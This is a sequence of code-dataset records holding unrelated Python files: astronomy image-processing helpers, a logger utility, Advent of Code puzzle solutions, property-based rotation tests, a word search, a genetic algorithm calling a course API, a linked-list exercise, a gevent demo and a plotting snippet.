* scale\n\n return distance\n\ndef factor_b2m(Td):\n \"\"\"\n \"\"\"\n z = 0.016858\n h = 6.626e-27 # erg.s\n k = 1.38e-16 # erg/K\n nu_obs = 234.6075e+9 / (1 + z) #GHz\n alpha_850 = 6.7e+19\n \n factor = h * nu_obs * (1+z) / (k * Td)\n factor_0 = h * 352.6970094e+9 * (1+0) / (k * Td)\n gamma_rj = factor / (np.exp(factor) - 1)\n gamma_0 = factor_0 / (np.exp(factor_0) - 1)\n factor_b2m_tmp1 = 1.78 * (1+z)**-4.8 * (352.6970094/234.6075)**3.8\n factor_b2m_tmp2 = (69.4/1000.)**2 * 10.e+10\n factor_b2m_tmp3 = factor_b2m_tmp1 * factor_b2m_tmp2\n factor_b2m = factor_b2m_tmp3 * (6.7e+19/alpha_850) * gamma_0/gamma_rj\n \n return factor_b2m\n\ndef beam(imagename):\n \"\"\"\n for moment map creation\n \"\"\"\n major = imhead(imagename = imagename,\n mode = \"get\",\n hdkey = \"beammajor\")[\"value\"]\n minor = imhead(imagename = imagename,\n mode = \"get\",\n hdkey = \"beamminor\")[\"value\"]\n \n return major, minor\n\ndef beam_area(imagename):\n \"\"\"\n \"\"\"\n major = imhead(imagename = imagename,\n mode = \"get\",\n hdkey = \"beammajor\")[\"value\"]\n minor = imhead(imagename = imagename,\n mode = \"get\",\n hdkey = \"beamminor\")[\"value\"]\n pix = abs(imhead(imagename = imagename,\n mode = \"list\")[\"cdelt1\"])\n \n pixelsize = pix * 3600 * 180 / np.pi\n beamarea_arcsec = major * minor * np.pi/(4 * np.log(2))\n beamarea_pix = beamarea_arcsec / (pixelsize ** 2)\n \n return beamarea_pix\n\n#####################\n### Main Procedure\n#####################\n# import data\ndata = np.loadtxt(dir_data + txt_flux)\nx1 = data[:,0]\ny1 = data[:,1]\nfl_12co10 = data[:,2] # Jy/beam.km/s\nfl_band6 = data[:,9] # Jy/beam\n\n# import Tkin\nTkin = np.loadtxt(txt_tkin,usecols=(2,3))[:,0]\n\n# convert Jy/beam.km/s to K.km/s\nmajor, minor = beam(repimage)\nnu_obs_co10 = 115.27120 / (1 + redshift)\nbeta_co10 = 1.222e6 / major / minor / nu_obs_co10**2\nkelvin_12co10 = fl_12co10 * beta_co10\n\n# convert Jy/beam to Jy\nbeamarea_pix = beam_area(repimage)\nfl_band6_Jy = fl_band6 / beamarea_pix\n\n# radial distance\nr = distance_kpc(x1,y1,ra,decl)\n\n\n\"\"\"\n# measure column density using rotation diagram for 13CO\nproduct1 = dir_data + \"ngc3110_alpha_lte.txt\"\nos.system(\"rm -rf \" + product1)\nf = open(product1, \"w\")\nf.write(\"# x y distance alpha_lte(Trot) alpha_lte(Tkin)\\n\")\nf.close()\nfor i in range(len(kelvin_13co21)):\n logN_rot, Qrot = myana.rot0_13co(15.0, kelvin_13co21[i], data = \"../Qrot_CDMS.txt\")\n logN_kin, Qrot = myana.rot0_13co(Tkin[i], kelvin_13co21[i], data = \"../Qrot_CDMS.txt\")\n \n if fl_12co10[i] > 0:\n #\n NH2 = 10**logN_rot / X13co\n X_co = NH2 / kelvin_12co10[i]\n alpha_lte_Trot = 4.3 * X_co / 2e+20\n #\n NH2 = 10**logN_kin / X13co\n X_co = NH2 / kelvin_12co10[i]\n alpha_lte_Tkin = 4.3 * X_co / 2e+20\n else:\n alpha_lte_Trot = 0.0\n alpha_lte_Tkin = 0.0\n \n if Tkin[i]==0:\n alpha_lte_Tkin = 0.0\n \n f = open(product1, \"a\")\n f.write(str(x1[i]) + \" \" + str(y1[i]) + \" \" + str(r[i]) \\\n + \" \" + str(alpha_lte_Trot) + \" \" + str(alpha_lte_Tkin) + \"\\n\")\n f.close()\n\"\"\"\n","repo_name":"toshikisaito1005/mycasa_scripts","sub_path":"mycasa_scripts_active/scripts_ts08_ngc3110/myim13_alpha_ism.py","file_name":"myim13_alpha_ism.py","file_ext":"py","file_size_in_byte":4377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72155643369","text":"# -*- coding: utf-8 -*-\nimport os\nimport logging\nfrom logging.handlers import RotatingFileHandler\nimport sys\n\n# logging config\nBASE_DIR = 
os.path.abspath(os.path.dirname(os.path.dirname(__file__)))\n\n\ndef get_logger(splider_name):\n '''\n Log files live in the logs directory next to the spider\n Each log file is at most 10MB\n Error logs are additionally written to a separate file\n '''\n logger = logging.getLogger()\n logger.setLevel(logging.DEBUG)\n\n if logger.handlers:\n print(\"=====logger has handlers=====\")\n return logger\n\n formatter = logging.Formatter('%(asctime)s [%(levelname)-8s]: %(message)s')\n\n # handler_file_warning = logging.FileHandler(os.path.join(BASE_DIR,\"logs/%s.error.log\"%(\".\".join(splider_name.split('.')[:-1]))))\n handler_file_warning = RotatingFileHandler(os.path.join(BASE_DIR, \"logs/{}.error.log\".format(splider_name)),\n mode='a', maxBytes=10 * 1024 * 1024, backupCount=2, encoding=None,\n delay=0)\n handler_file_warning.setLevel(logging.WARNING)\n handler_file_warning.setFormatter(formatter)\n logger.addHandler(handler_file_warning)\n\n # handler_file_normal = logging.FileHandler(os.path.join(BASE_DIR,\"logs/%s.log\"%(\".\".join(splider_name.split('.')[:-1]))))\n handler_file_normal = RotatingFileHandler(os.path.join(BASE_DIR, \"logs/{}.log\".format(splider_name)),\n mode='a', maxBytes=10 * 1024 * 1024, backupCount=5, encoding=None,\n delay=0)\n handler_file_normal.setLevel(logging.DEBUG)\n handler_file_normal.setFormatter(formatter)\n logger.addHandler(handler_file_normal)\n\n handler_console = logging.StreamHandler(sys.stdout)\n handler_console.formatter = formatter\n logger.addHandler(handler_console)\n\n return logger\n\nif __name__ == \"__main__\":\n print(BASE_DIR)\n","repo_name":"goddessofpom/POM-crawler","sub_path":"component/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":1920,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"26487882516","text":"import collections\nimport sys\nfrom helperfunc import *\n\n\ndef prepare_input(input_file):\n lines = read_input_lines(input_file)\n split = lines.index('')\n length = int((len(lines[split-1])+1)/4)\n stacks = []\n for i in range(length):\n stacks.append(collections.deque())\n for i in range(split-2, -1, -1):\n for j in range(int((len(lines[i])+1)/4)):\n value = lines[i][j*4+1]\n if value != ' ':\n stacks[j].append(value)\n moves = []\n for i in range(split+1, len(lines)):\n moves.append([int(elem) for elem in lines[i].split(' ') if elem.isnumeric()])\n return stacks, moves\n\n\ndef part1(input_tuple):\n stacks, moves = input_tuple\n for move in moves:\n for j in range(move[0]):\n stacks[move[2]-1].append(stacks[move[1]-1].pop())\n res = \"\"\n return res.join(([stack.pop() for stack in stacks]))\n\n\ndef part2(input_tuple):\n stacks, moves = input_tuple\n for move in moves:\n temp = collections.deque()\n for j in range(move[0]):\n temp.append(stacks[move[1] - 1].pop())\n for j in range(move[0]):\n stacks[move[2]-1].append(temp.pop())\n res = \"\"\n return res.join(([stack.pop() for stack in stacks]))\n\n\ndef main() -> None:\n if len(sys.argv) > 2:\n input_file = sys.argv[2]\n else:\n input_file = '../input/'+sys.argv[0][:-3]+'.txt'\n if sys.argv[1] == '1':\n print(part1(prepare_input(input_file)))\n elif sys.argv[1] == '2':\n print(part2(prepare_input(input_file)))\n else:\n raise Exception(\"Please clarify, which part you wanna execute.\")\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Godototot/AoC22","sub_path":"code/day5.py","file_name":"day5.py","file_ext":"py","file_size_in_byte":1668,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"25243243733","text":"from __future__ import 
annotations\n\nimport argparse\nimport heapq\nimport os.path\nfrom collections import defaultdict\nfrom string import ascii_lowercase\n\nimport networkx as nx\nimport pytest\n\nimport support\n\nINPUT_TXT = os.path.join(os.path.dirname(__file__), \"input.txt\")\n\n\ndef compute(s: str) -> int | None:\n start = end = (0, 0)\n\n lines = s.splitlines()\n size_x, size_y = len(lines), len(lines[0])\n\n # Get start and end position and normalize values.\n cells = {}\n for x, line in enumerate(lines):\n for y, letter in enumerate(line):\n if letter == \"E\":\n letter = \"z\"\n end = (x, y)\n if letter == \"S\":\n letter = \"a\"\n start = (x, y)\n cells[(x, y)] = ascii_lowercase.index(letter)\n\n # Compute possible moves from every position.\n moves = defaultdict(list)\n for (x, y), value in cells.items():\n if (y < size_y - 1) and (value - cells[x, y + 1]) >= -1:\n moves[(x, y)].append((0, 1))\n\n if (y > 0) and (value - cells[x, y - 1]) >= -1:\n moves[(x, y)].append((0, -1))\n\n if (x < size_x - 1) and (value - cells[x + 1, y]) >= -1:\n moves[(x, y)].append((1, 0))\n\n if (x > 0) and (value - cells[x - 1, y]) >= -1:\n moves[(x, y)].append((-1, 0))\n\n # Dijkstra shortest path implementation using heapq\n seen = set()\n todo = [(0, start)]\n\n while todo:\n cost, point = heapq.heappop(todo)\n\n if point == end:\n return cost\n elif point in seen:\n continue\n else:\n seen.add(point)\n\n for possible_move in moves[point]:\n next_place = point[0] + possible_move[0], point[1] + possible_move[1]\n if cells[next_place] - cells[point] <= 1:\n heapq.heappush(todo, (cost + 1, next_place))\n\n\ndef compute_nx(s: str) -> int:\n # Actually 2x slower due to the Graph building part\n start = end = (0, 0)\n\n lines = s.splitlines()\n size_x, size_y = len(lines), len(lines[0])\n\n # Get start and end position and normalize values.\n cells = {}\n for x, line in enumerate(lines):\n for y, letter in enumerate(line):\n if letter == \"E\":\n letter = \"z\"\n end = (x, y)\n if letter == \"S\":\n letter = \"a\"\n start = (x, y)\n cells[(x, y)] = ascii_lowercase.index(letter)\n\n # Build a graph from all possible edges\n G = nx.DiGraph()\n for (x, y), value in cells.items():\n if (y < size_y - 1) and (value - cells[x, y + 1]) >= -1:\n G.add_edge((x, y), (x, y + 1))\n\n if (y > 0) and (value - cells[x, y - 1]) >= -1:\n G.add_edge((x, y), (x, y - 1))\n\n if (x < size_x - 1) and (value - cells[x + 1, y]) >= -1:\n G.add_edge((x, y), (x + 1, y))\n\n if (x > 0) and (value - cells[x - 1, y]) >= -1:\n G.add_edge((x, y), (x - 1, y))\n\n return nx.dijkstra_path_length(G, source=start, target=end)\n\n\nINPUT_S = \"\"\"\\\nSabqponm\nabcryxxl\naccszExk\nacctuvwj\nabdefghi\n\"\"\"\nEXPECTED = 31\n\n\n@pytest.mark.parametrize(\n (\"input_s\", \"expected\"),\n ((INPUT_S, EXPECTED),),\n)\ndef test(input_s: str, expected: int) -> None:\n assert compute(input_s) == expected\n\n\n@pytest.mark.parametrize(\n (\"input_s\", \"expected\"),\n ((INPUT_S, EXPECTED),),\n)\ndef test2(input_s: str, expected: int) -> None:\n assert compute_nx(input_s) == expected\n\n\ndef main() -> int:\n parser = argparse.ArgumentParser()\n parser.add_argument(\"data_file\", nargs=\"?\", default=INPUT_TXT)\n args = parser.parse_args()\n\n with open(args.data_file) as f, support.timing():\n print(compute(f.read()))\n\n with open(args.data_file) as f, support.timing():\n print(compute_nx(f.read()))\n\n return 0\n\n\nif __name__ == \"__main__\":\n raise 
SystemExit(main())\n","repo_name":"UnknownPlatypus/AOC2022","sub_path":"day12/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":3868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19986322029","text":"from ErnosCube.rotation_enum import RotationEnum\nfrom hypothesis import given\nfrom hypothesis.strategies import data\nfrom copy import deepcopy\nfrom pytest import mark, raises\n\n\nclass PlaneRotatableTests:\n \"\"\"A test suite of tests for classes that inherit `PlaneRotatable`.\n\n This class implements a suite of propery based tests that all\n `PlaneRotatable` objects are expected to pass. A test suite for a specific\n rotatable class can incorporate this tests by inheriting this class and\n specifying the member variable `objs`, `objs_minus_c4`, and `objs_minus_c2`\n with hypothesis strategies, and implementing the methods\n `construction_test`, `rotate_cw_test`, `rotate_ccw_test`, and\n `rotate_ht_test`.\n\n The design is such that once each of the rotation methods are sufficiently\n tested for some ground case(s) in `rotate_*_test`, then the property based\n tests implemented with hypothesis will provide additional confidence about\n the correctness of the `rotate_*` methods. It is recognized that\n exhaustively testing the object space of a `PlaneRotatable` class is not\n desirable, or practical. The implementations of each `rotate_*_test` should\n be as straightforward and hard coded as possible. Only a few example cases\n are recommended (although, one could implement an exhaustive test suite in\n this method, if desired). This class makes it sufficient to have only a\n few, hand-selected examples tested so that one can have confidence that the\n methods `rotate_*` are working properly.\n\n Hypothesis does the heavy lifting by sampling the object space, and\n revealing any unexpected behavior that is encountered. For more information\n about hypothesis see:\n https://hypothesis.readthedocs.io/en/latest/index.html\n\n The strategy for `objs` should cover as much of object space for the\n `PlaneRotatable` class as practical. This will ensure a wide test coverage\n and increase the chance of an obscure bug being caught.\n\n The strategy for `objs_minus_c4` should produce arbitrary rotatable objects\n that are not in the `C_4` group. In other words, the generated rotatable\n objects from this strategy should not have 90-degree rotational symmetry.\n Similarly, `objs_minus_c2` should produce rotatable objects that are not in\n the `C_2` group (i.e. they do not have 180-degree symmetry).\n See: https://en.wikipedia.org/wiki/Rotational_symmetry#Discrete_rotational_symmetry\n\n Neither of the `objs_minus_*` strategies should use the `rotate_*` methods\n in their definition. The intent of these strategies is to test the\n properies of the `rotate_*` methods. If one uses `rotate_*` in the\n definition of a strategy it might lead to a false sense of assurance in the\n correctness of each method's implementations. Since `C_2` is a superset of\n `C_4`, `objs_minus_c2` may be used to generate `objs_minus_c4` using the\n `one_of` strategy from hypothesis. E.g. create `objs_minus_c2` and\n `c2_minus_c4`. 
Then, `objs_minus_c4 = one_of(objs_minus_c2, c2_minus_c4)`.\n\n It is anticipated that the specification of the `rotatable_objs_minus_*`\n strategies might be tedious without the use of the `rotate_*` functions.\n So, it is recommended that a subset of the many possible rotatable objects\n are hard coded into the strategy definitions.\n \"\"\"\n\n objs = None\n objs_minus_c2 = None\n objs_minus_c4 = None\n\n @mark.dependency(name=\"construction\")\n def test_construction(self):\n self.construction_test()\n\n def construction_test(self):\n assert False, \"not implemented\"\n\n @mark.dependency(name=\"rotate_cw\", depends=[\"construction\"])\n def test_rotate_cw(self):\n self.rotate_cw_test()\n\n def rotate_cw_test(self):\n assert False, \"not implemented\"\n\n @mark.dependency(name=\"rotate_ccw\", depends=[\"construction\"])\n def test_rotate_ccw(self):\n self.rotate_ccw_test()\n\n def rotate_ccw_test(self):\n assert False, \"not implemented\"\n\n @mark.dependency(name=\"rotate_ht\", depends=[\"construction\"])\n def test_rotate_ht(self):\n self.rotate_ht_test()\n\n def rotate_ht_test(self):\n assert False, \"not implemented\"\n\n @mark.dependency(name=\"objs\")\n def test_objs_def(self):\n assert self.objs is not None\n\n @mark.dependency(name=\"objs_minus_c2\")\n def test_objs_minus_c2(self):\n assert self.objs_minus_c2 is not None\n\n @mark.dependency(name=\"objs_minus_c4\")\n def test_objs_minus_c4(self):\n assert self.objs_minus_c4 is not None\n\n @mark.dependency(name=\"deepcopy\", depends=[\"construction\", \"objs\"])\n @given(data())\n def test_deepcopy(self, data):\n obj = data.draw(self.objs)\n deepcopy(obj)\n\n @mark.dependency(name=\"equality\", depends=[\"deepcopy\"])\n @given(data())\n def test_equality(self, data):\n obj = data.draw(self.objs)\n assert obj == obj, f\"failed for {str(obj)}\\n{repr(obj)}\"\n obj_copy = deepcopy(obj)\n assert obj == obj_copy, f\"failed for {str(obj)}\\n{repr(obj)}\"\n\n @mark.dependency(name=\"inequality\", depends=[\"equality\"])\n @given(data())\n def test_inequality(self, data):\n a = data.draw(self.objs)\n b = data.draw(self.objs)\n if a == b:\n assert (\n not a != b\n ), f\"failed for {str(a)}\\n{repr(a)}\\nand {str(b)}\\n{repr(b)}\"\n else:\n assert a != b, f\"failed for {str(a)}\\n{repr(a)}\\nand {str(b)}\\n{repr(b)}\"\n\n @mark.dependency(depends=[\"equality\", \"rotate_cw\"])\n @given(data())\n def test_cw_invertability(self, data):\n obj = data.draw(self.objs)\n gold = deepcopy(obj)\n obj = obj.rotate_cw().rotate_cw().rotate_cw().rotate_cw()\n assert obj == gold, f\"failed for {str(obj)}\\n{repr(obj)}\"\n\n @mark.dependency(depends=[\"equality\", \"rotate_ccw\"])\n @given(data())\n def test_ccw_invertability(self, data):\n obj = data.draw(self.objs)\n gold = deepcopy(obj)\n obj = obj.rotate_ccw().rotate_ccw().rotate_ccw().rotate_ccw()\n assert obj == gold, f\"failed for {str(obj)}\\n{repr(obj)}\"\n\n @mark.dependency(depends=[\"equality\", \"rotate_ht\"])\n @given(data())\n def test_ht_invertability(self, data):\n obj = data.draw(self.objs)\n gold = deepcopy(obj)\n assert (\n obj.rotate_ht().rotate_ht() == gold\n ), f\"failed for {str(obj)}\\n{repr(obj)}\"\n\n @mark.dependency(depends=[\"equality\", \"rotate_cw\", \"rotate_ccw\"])\n @given(data())\n def test_cw_ccw_invertability(self, data):\n obj = data.draw(self.objs)\n gold = deepcopy(obj)\n assert (\n obj.rotate_cw().rotate_ccw() == gold\n ), f\"failed for {str(obj)}\\n{repr(obj)}\"\n assert (\n obj.rotate_ccw().rotate_cw() == gold\n ), f\"failed for {str(obj)}\\n{repr(obj)}\"\n\n 
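    # --- Illustrative sketch (an assumption, not part of the original suite):
    # one way a concrete subclass could wire up the strategies the class
    # docstring above describes. `Face2x2` is a hypothetical PlaneRotatable
    # whose constructor takes four sticker labels; only the strategy plumbing
    # is the point here.
    #
    # from hypothesis.strategies import one_of, sampled_from
    #
    # class Face2x2Tests(PlaneRotatableTests):
    #     # no 180-degree symmetry: one sticker differs from the other three
    #     objs_minus_c2 = sampled_from([Face2x2("a", "b", "b", "b")])
    #     # 180-degree symmetric, but not 90-degree symmetric
    #     _c2_minus_c4 = sampled_from([Face2x2("a", "b", "a", "b")])
    #     objs_minus_c4 = one_of(objs_minus_c2, _c2_minus_c4)
    #     # full object space: also include a fully symmetric face
    #     objs = one_of(objs_minus_c4, sampled_from([Face2x2("a", "a", "a", "a")]))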
@mark.dependency(depends=[\"equality\", \"rotate_cw\", \"rotate_ht\"])\n @given(data())\n def test_ht_2cw_equivalence(self, data):\n obj = data.draw(self.objs)\n gold = deepcopy(obj).rotate_cw().rotate_cw()\n obj = obj.rotate_ht()\n assert obj == gold, f\"failed for {str(obj)}\\n{repr(obj)}\"\n\n @mark.dependency(depends=[\"equality\", \"rotate_ccw\", \"rotate_ht\"])\n @given(data())\n def test_ht_2ccw_equivalence(self, data):\n obj = data.draw(self.objs)\n gold = deepcopy(obj).rotate_ccw().rotate_ccw()\n obj = obj.rotate_ht()\n assert obj == gold, f\"failed for {str(obj)}\\n{repr(obj)}\"\n\n @mark.dependency(depends=[\"equality\", \"rotate_cw\", \"rotate_ccw\"])\n @given(data())\n def test_3cw_ccw_equivalence(self, data):\n obj = data.draw(self.objs)\n gold = deepcopy(obj).rotate_ccw()\n obj = obj.rotate_cw().rotate_cw().rotate_cw()\n assert obj == gold, f\"failed for {str(obj)}\\n{repr(obj)}\"\n\n @mark.dependency(depends=[\"equality\", \"rotate_cw\", \"rotate_ccw\"])\n @given(data())\n def test_3ccw_cw_equivalence(self, data):\n obj = data.draw(self.objs)\n gold = deepcopy(obj).rotate_cw()\n obj = obj.rotate_ccw().rotate_ccw().rotate_ccw()\n assert obj == gold, f\"failed for {str(obj)}\\n{repr(obj)}\"\n\n @mark.dependency(depends=[\"objs_minus_c4\", \"inequality\", \"rotate_cw\"])\n @given(data())\n def test_cw_non_idempotence(self, data):\n obj = data.draw(self.objs_minus_c4)\n obj_copy = deepcopy(obj).rotate_cw()\n assert obj != obj_copy, f\"failed for {str(obj)}\\n{repr(obj)}\"\n\n @mark.dependency(depends=[\"objs_minus_c4\", \"inequality\", \"rotate_ccw\"])\n @given(data())\n def test_ccw_non_idempotence(self, data):\n obj = data.draw(self.objs_minus_c4)\n obj_copy = deepcopy(obj).rotate_ccw()\n assert obj != obj_copy, f\"failed for {str(obj)}\\n{repr(obj)}\"\n\n @mark.dependency(depends=[\"objs_minus_c2\", \"inequality\", \"rotate_ht\"])\n @given(data())\n def test_ht_non_idempotence(self, data):\n obj = data.draw(self.objs_minus_c2)\n obj_copy = deepcopy(obj).rotate_ht()\n assert obj != obj_copy, f\"failed for {str(obj)}\\n{repr(obj)}\"\n\n @mark.dependency(\n depends=[\n \"equality\",\n \"deepcopy\",\n \"rotate_cw\",\n \"rotate_ccw\",\n \"rotate_ht\",\n \"objs_minus_c2\",\n ]\n )\n @given(data())\n def test_get_iso_transform(self, data):\n a = data.draw(self.objs_minus_c2)\n\n b = deepcopy(a)\n assert a == b\n transformation = a.get_iso_transform(b)\n err_str = f\"{a}:\\n{repr(a)}\\n{transformation}\"\n assert transformation == RotationEnum.NOTHING, err_str\n\n b = deepcopy(a).rotate_cw()\n assert a != b\n transformation = a.get_iso_transform(b)\n err_str = f\"{a}:\\n{repr(a)}\\n{transformation}\"\n assert transformation == RotationEnum.CW, err_str\n\n b = deepcopy(a).rotate_ccw()\n assert a != b\n transformation = a.get_iso_transform(b)\n err_str = f\"{a}:\\n{repr(a)}\\n{transformation}\"\n assert transformation == RotationEnum.CCW, err_str\n\n b = deepcopy(a).rotate_ht()\n assert a != b\n transformation = a.get_iso_transform(b)\n err_str = f\"{a}:\\n{repr(a)}\\n{transformation}\"\n assert transformation == RotationEnum.HT, err_str\n\n c = data.draw(self.objs_minus_c4)\n transformation = a.get_iso_transform(c)\n err_str = f\"{a}:\\n{repr(a)}\\n{c}:\\n{repr(c)}\\n{transformation}\"\n if transformation is None:\n for _ in range(4):\n a = a.rotate_cw()\n assert a != c, err_str\n else:\n verified_isomorphic = False\n for _ in range(4):\n a = a.rotate_cw()\n if a == c:\n verified_isomorphic = True\n break\n assert verified_isomorphic, err_str\n\n @mark.dependency(\n depends=[\n 
\"equality\",\n \"deepcopy\",\n \"rotate_cw\",\n \"rotate_ccw\",\n \"rotate_ht\",\n \"objs_minus_c4\",\n ]\n )\n @given(data())\n def test_rotate(self, data):\n a = data.draw(self.objs)\n b = deepcopy(a)\n\n assert a.rotate(RotationEnum.NOTHING) == b\n assert a.rotate_cw().rotate(RotationEnum.CCW) == b\n assert a.rotate_ht().rotate(RotationEnum.HT) == b\n assert a.rotate_ccw().rotate(RotationEnum.CW) == b\n\n with raises(AssertionError):\n a.rotate(None)\n\n with raises(Exception):\n a.rotate(12)\n","repo_name":"andfranklin/ErnosCube","sub_path":"tests/plane_rotatable_tests.py","file_name":"plane_rotatable_tests.py","file_ext":"py","file_size_in_byte":11493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32689142206","text":"row = [-1, -1, -1, 0, 0, 1, 1, 1]\ncol = [-1, 0, 1, -1, 1, -1, 0, 1]\n\ndef isValid(mat, x, y, path):\n\treturn (0 <= x < len(mat)) and (0 <= y < len(mat[0])) and (x, y) not in path\n\ndef DFS(mat, word, i, j, path=[], index=0):\n if mat[i][j] != word[index]:\n return None\n path.append((i, j))\n if index == len(word) - 1:\n print(path)\n else:\n for z in range(len(row)):\n if isValid(mat, i + row[z], j + col[z], path):\n DFS(mat, word, i + row[z], j + col[z], path, index + 1)\n path.pop()\n\ndef WordSearch(mat, word):\n\t# base case\n\tif not mat or not len(mat) or not len(word):\n\t\treturn\n\n\tfor i in range(len(mat)):\n\t\tfor j in range(len(mat[0])):\n\t\t\tDFS(mat, word, i, j)\n\n\nif __name__ == '__main__':\n\n\tmat = [\n\t\t['A', 'D', 'E', 'B', 'C'],\n\t\t['O', 'O', 'C', 'A', 'X'],\n\t\t['S', 'C', 'D', 'K', 'C'],\n\t\t['O', 'D', 'E', 'H', 'L']\n\t]\n\tword = 'CODE'\n\n\tWordSearch(mat, word)\n","repo_name":"anguzz/AI-projects","sub_path":"Assignments/A2/WordSearch.py","file_name":"WordSearch.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73681312167","text":"import numpy as np\nimport client as ta\nimport json\nSECRET = 'z60uCu1jsJeEi4n96iH7qwpMMnvIO1BEdnbC38CokXIn9y9lSR'\n# TODO: We need to fig out these values... 
hmm\nMUTATION_PERC = 0.3\nMUTATION_RANGE = 1\nPOPULATION_SIZE = 7\nMATE_POOL_SIZE = 3\nMAX_GEN = 10\ninitial_chromosome = []\nctr = 0\n\n\ndef mutate_children(children, low=-MUTATION_RANGE, high=MUTATION_RANGE):\n for i in range(len(children)):\n noise = np.random.uniform(low=low, high=high, size=children[i].shape)\n indices = np.random.choice(np.arange(\n children[i].size), replace=False, size=int(children[i].size*(1-MUTATION_PERC)))\n noise[indices] = 0\n children[i] += noise\n return np.clip(children, -10, 10)\n\n\ndef get_fitness(chromosomes):\n fitness = []\n for chromosome in chromosomes:\n ta_answer = ta.get_errors(SECRET, list(chromosome))\n fitness.append(ta_answer[0]+ta_answer[1])\n print(\n f'train error: {ta_answer[0]}, validation error: {ta_answer[1]}')\n return np.array(fitness)\n\n\ndef isIn(given_array, actual_list):\n for element in actual_list:\n if np.array_equal(element, given_array):\n return True\n return False\n\n\ndef cross(parent1, parent2):\n point = np.random.randint(4, 7)\n child1 = np.concatenate((parent1[:point], parent2[point:]), axis=0)\n child2 = np.concatenate((parent2[:point], parent1[point:]), axis=0)\n return child1, child2\n\n\ndef breed(selected_population):\n children = []\n child1, child2 = cross(selected_population[0], selected_population[1])\n children.append(child1)\n children.append(child2)\n mating_combinations = []\n while len(children) < (POPULATION_SIZE - MATE_POOL_SIZE):\n par_num1 = np.random.randint(0, np.shape(selected_population)[0])\n par_num2 = (par_num1 + 1) % np.shape(selected_population)[0]\n mating_combinations.append([par_num1, par_num2])\n child1, child2 = cross(\n selected_population[par_num1], selected_population[par_num2])\n if not isIn(child1, children):\n children.append(child1)\n if len(children) == POPULATION_SIZE-MATE_POOL_SIZE:\n break\n if not isIn(child2, children):\n children.append(child2)\n if len(children) == POPULATION_SIZE-MATE_POOL_SIZE:\n break\n return mutate_children(np.array(children))\n\n\ndef get_init(chromosome):\n '''Gets the initial Chromosomes'''\n temp = [list(chromosome) for i in range(POPULATION_SIZE)]\n temp = np.array(temp, dtype=np.double)\n temp = mutate_children(temp, -1, 1)\n temp[0] = chromosome\n return temp\n\n\n# TODO: Should this be read from file? That is, will the file overfit.txt be in evaluations or should it be hard-coded? 
ASK A TA...\nwith open(\"overfit.txt\", \"r\") as f:\n initial_chromosome = json.load(f)\n\npopulation = get_init(initial_chromosome)\nfitness = get_fitness(population)\n\nfor gen in range(MAX_GEN+1):\n sorted_fitness_index = np.argsort(fitness)\n population = population[sorted_fitness_index]\n fitness = fitness[sorted_fitness_index]\n print(\n f'gen: {gen} best:{fitness[0]}')\n population = population[:POPULATION_SIZE]\n fitness = fitness[:POPULATION_SIZE]\n selected_population = population[: MATE_POOL_SIZE]\n selected_fitness = fitness[: MATE_POOL_SIZE]\n children = breed(selected_population)\n children_fitness = get_fitness(children)\n population = np.concatenate((population, children), axis=0)\n fitness = np.concatenate((fitness, children_fitness), axis=0)\n\nfinal_fitness = np.min(fitness)\nprint(\"Answer\", final_fitness)\n","repo_name":"arjunth2001/Machine-Data-and-Learning","sub_path":"Genetic-Algorithms-Project/Trials/23_02/ga.py","file_name":"ga.py","file_ext":"py","file_size_in_byte":3582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38796155062","text":"# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\n\nclass Solution:\n def addTwoNumbers(self, l1: ListNode, l2: ListNode) -> ListNode:\n if not l1.val or not l2.val:\n return l1 if l1.val else l2\n num1 = 0\n while l1:\n num1 = num1*10 + l1.val\n l1 = l1.next\n num2 = 0\n while l2:\n num2 = num2*10 + l2.val\n l2 = l2.next\n num = num1 + num2\n ans = ListNode(0)\n\n while num:\n p = ListNode(num % 10)\n num = num // 10\n tmp = ans.next\n ans.next = p\n p.next = tmp\n return ans.next\n","repo_name":"saycmily/vtk-and-python","sub_path":"leecode/1-500/401-500/445-两数相加Ⅱ.py","file_name":"445-两数相加Ⅱ.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71265487847","text":"#!/usr/bin/env python3\n# coding: utf-8\n# File: gevent_demo.py\n# Author: lxw\n# Date: 12/11/17 2:30 PM\n\nimport gevent\nimport time\n\nfrom gevent import monkey\n\n# monkey.patch_socket()\n\ndef f(n):\n for i in range(n):\n print(\"gevent.getcurrent(): {0}. 
i: {1}\".format(gevent.getcurrent(), i))\n # time.sleep(1) # NO\n gevent.sleep(1) # OK\n\n\ndef main():\n g1 = gevent.spawn(f, 5)\n g2 = gevent.spawn(f, 5)\n g3 = gevent.spawn(f, 5)\n g1.join()\n g2.join()\n g3.join()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"lxw0109/Python_Demos","sub_path":"gevent_demo.py","file_name":"gevent_demo.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"363223951","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\nx = np.linspace(0,10,1000) # independent variable for plotting\ny = np.sin(x) + 1 # dependent variable y\nz = np.cos(x ** 2) + 1 # dependent variable z\n\nplt.figure(figsize=(8, 4)) # set the figure size\nplt.plot(x , y, label = '$\\sin x + 1$', color = 'red', linewidth = 2) # plot; set label, line color and line width\nplt.plot(x, z, 'b--', label = '$\\cos x^2+1$') # plot; set label and line style\nplt.xlabel('Time(s)') # set the x-axis label\nplt.ylabel('Volt') # set the y-axis label\nplt.title('A simple example') # set the 